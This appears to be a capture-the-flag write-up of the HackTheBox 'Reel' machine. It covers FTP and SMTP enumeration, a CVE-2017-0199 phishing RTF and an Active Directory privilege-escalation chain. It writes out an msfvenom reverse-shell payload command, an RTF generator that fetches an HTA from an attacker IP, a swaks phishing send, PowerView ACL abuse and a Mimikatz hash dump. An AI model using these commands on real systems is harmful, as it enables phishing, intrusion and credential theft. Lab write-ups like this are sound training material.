8.6 KiB
HackTheBox-Reel
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS
SessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
PORT 21 (FTP)
FTP has anonymous login enabled so we can easily login
We see a folder named documents
And in the folder we can see three files
Opening the Applocker.docx file it tell about making rules for some scripts
Opening Windows Event Forwarding.docx will warn us having a macro in it and will fail to recover document
Lastly the text file has this conent in it
Please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running exiftool on word documents we get a username
PORT 25 (SMTP)
To check if it's a correct email addres we can use VRFY to check but that command is not allowed in this smtp server
Instead we can use RCPT to check if the email address is valid
And nico@megabank.com is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE CVE-2017-0199
http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html
Foothold
Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using msfvenom
sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh
> abc.hta
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1
0.14.17/abc.hta
Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called sawks
http://www.jetmore.org/john/code/swaks/
So running this to send an email to nico and starting the python server to hosts the hta file
swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf
In nico's directory in Desktop folder we can see a cred.xml file, reading that file it seems that there's an encrpyted password for Tom
Privilege Escalation (Tom)
Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang
So we can just pass arguemnts to powershell and decrypt the password for user Tom
powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"
Now that we have credentials for tom user we can use ssh to login
Checking which groups this user is in
In the Desktop directory we see a folder AD Audit which already has bloodhound folder in it
And from the text file it seems that no path is there to domain admin
We can import and run PowerView commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine
Privilege Escalation (Claire)
So we can bypass this by loading the script in the memory through IEX which downloads the script and loads it into the memory
`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`
To transfer this we can use impacket's smbserver to copy the zip file onto our machine
After this is transferred we can use bloodhound GUI to see what we can abuse in AD
We have WriteOwner access on claire object so we can own this object and give All rights on this object in order to reset password
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose
Privilege Escalation (Administrator)
Now through Claire we can see that we have WriteDacl on BACKUP_ADMINS
We can see the absue that we can add users to this group
So logging in back with tom we see that we are a member of this group now
But it gets reverted quickly so we need to be quick in navigating to Administrators folder and there we will find some backup scripts out which BackupScript.ps1 has a password for administrator account
Having the password we can login through ssh
Further loading Mimikatz we can dump SAM hashes
References
- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
- https://github.com/bhdresh/CVE-2017-0199
- https://linux.die.net/man/1/swaks
- http://www.jetmore.org/john/code/swaks/
- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993